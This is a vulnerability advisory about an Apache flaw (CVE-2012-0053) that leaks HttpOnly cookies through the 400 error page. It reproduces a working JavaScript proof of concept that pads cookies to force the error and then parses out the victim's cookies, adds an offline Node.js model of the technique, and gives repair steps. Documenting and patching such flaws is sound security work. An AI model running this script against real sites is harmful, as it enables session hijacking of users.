Apache HttpOnly Cookie XSS cross-site vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201338386
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-04-19T00:00:00


Many programs, including some commercial and mature open-source CMS and article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing the user's cookie: the browser then refuses to expose the cookie to JavaScript through document.cookie, which reduces the harm of an XSS bug. The issue described here can be used to bypass the HttpOnly attribute, because the cookie is read back out of an Apache error page instead of out of document.cookie.

Open a site served by a vulnerable Apache in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter. The script sets 10 padding cookies of 819 bytes each, which pushes the Cookie request header past Apache's default 8190-byte LimitRequestFieldSize; Apache answers 400 Bad Request and, on vulnerable versions, echoes the offending header (HttpOnly cookies included) inside a <pre> block of the error page:

// http://www.exploit-db.com/exploits/18442/
// Sets (good == undefined) or expires (good == true) the padding cookies xss0..xss9.
function setCookies (good) {
    // Construct string for cookie value: 819 bytes of "x"
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies. 10 cookies x 819 bytes plus names and separators exceeds the
    // default 8190-byte header field limit, so the next request gets a 400.
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content (the echoed request header)
            var content = xhr.responseText.replace(/\r|\n/g, "").match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep everything else (including HttpOnly ones)
                var cookies = content.replace(/xss\d=x+;?/g, "").split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies so the site works again
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request; the browser attaches all cookies, HttpOnly or not
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You can see that the 400 error page contains the cookie information, HttpOnly cookies included, and the script pops it up as JSON.
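The following Node.js example is added here and is not part of the original article or of the exploit from exploit-db; it models the two halves of the technique offline. buildCookieHeader shows how the padding cookies push the Cookie header past Apache's default 8190-byte LimitRequestFieldSize (the reason the request is rejected with 400), and extractLeakedCookies recovers the echoed Cookie line from a 400 page the way the exploit does, returning nothing when the page carries no <pre> block, which is what you get after the repair below (ErrorDocument 400 with a custom message, or a patched build). The two response bodies and the victim cookie values are constructed for this example, modeled on the Apache 2.2 default 400 page, not captured from a real server.

```javascript
// Added example (not from the article or the exploit author). Constructed inputs only.

const APACHE_DEFAULT_LIMIT_REQUEST_FIELD_SIZE = 8190; // bytes, Apache default

// Build the Cookie header a browser would send: the victim's real cookies first,
// then the padding cookies the exploit sets (count cookies of size bytes of "x").
function buildCookieHeader(realCookies, count, size) {
  const pad = "x".repeat(size);
  const parts = Object.entries(realCookies).map(([k, v]) => `${k}=${v}`);
  for (let i = 0; i < count; i++) parts.push(`xss${i}=${pad}`);
  return "Cookie: " + parts.join("; ");
}

// True when this single header field is larger than the server limit, so Apache
// rejects the request with 400 before it reaches any handler.
function exceedsFieldLimit(headerLine, limit = APACHE_DEFAULT_LIMIT_REQUEST_FIELD_SIZE) {
  return Buffer.byteLength(headerLine, "utf8") > limit;
}

// Same parsing step as the exploit: take the <pre> block out of a 400 page, strip
// the "Cookie: " prefix and the padding cookies, and return the rest as an object.
// Returns {} when there is no <pre> block (patched server or custom ErrorDocument).
function extractLeakedCookies(body) {
  const m = body.replace(/\r|\n/g, "").match(/<pre>(.+?)<\/pre>/);
  if (!m) return {};
  const line = m[1].replace(/^Cookie:\s*/, "").replace(/xss\d+=x+;?\s*/g, "");
  const out = {};
  for (const piece of line.split(";")) {
    const s = piece.trim();
    const eq = s.indexOf("=");
    if (!s || eq === -1) continue;
    out[s.slice(0, eq)] = s.slice(eq + 1);
  }
  return out;
}

// Constructed sample: what an unpatched Apache 2.2 sends back when a header field
// is too long. The offending header is echoed verbatim inside <pre>.
function vulnerable400Body(cookieHeader) {
  return (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n' +
    "<title>400 Bad Request</title>\n</head><body>\n<h1>Bad Request</h1>\n" +
    "<p>Your browser sent a request that this server could not understand.<br />\n" +
    "Size of a request header field exceeds server limit.<br />\n" +
    "<pre>\n" + cookieHeader + "\n</pre>\n</p>\n</body></html>\n"
  );
}

// Constructed sample: the body produced by  ErrorDocument 400 "security test"
// (a patched build likewise omits the header echo).
const HARDENED_400_BODY = "security test";

// Runs the whole scenario and returns the measurable results.
function demo() {
  const victim = { PHPSESSID: "8f3c0d2e5b7a", user: "alice" }; // constructed values
  const header = buildCookieHeader(victim, 10, 819);          // the exploit's 10 x 819
  return {
    headerBytes: Buffer.byteLength(header, "utf8"),
    triggers400: exceedsFieldLimit(header),
    leaked: extractLeakedCookies(vulnerable400Body(header)),
    leakedAfterFix: extractLeakedCookies(HARDENED_400_BODY),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

With the exploit's numbers the header comes to 8302 bytes, just over the 8190-byte default, which is why 10 cookies of 819 bytes were chosen; on the constructed vulnerable page the victim's PHPSESSID and user cookies come back, on the hardened page nothing does. To check a real server after applying the repair, send a request with an oversized Cookie header and confirm the 400 body contains no <pre> block.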

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

Repair solutions:

Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument). In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

After testing, for 400 errors only method 2 is effective: with a custom message configured, the response no longer includes the cookie content. This is consistent with the ErrorDocument documentation, which notes that when a malformed request is detected, normal processing is halted and the internal message may be used regardless of the setting; the redirect options (3 and 4) need Apache to keep processing a request it has already rejected, so verify the 400 path after the change rather than assuming it works.

Apache configuration (note the space between the directive and the status code):

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version also fixes it: the header echo in the 400 page was removed in Apache 2.2.22 (CVE-2012-0053, listed on the reference page below).

Reference: http://httpd.apache.org/security/vulnerabilities_22.html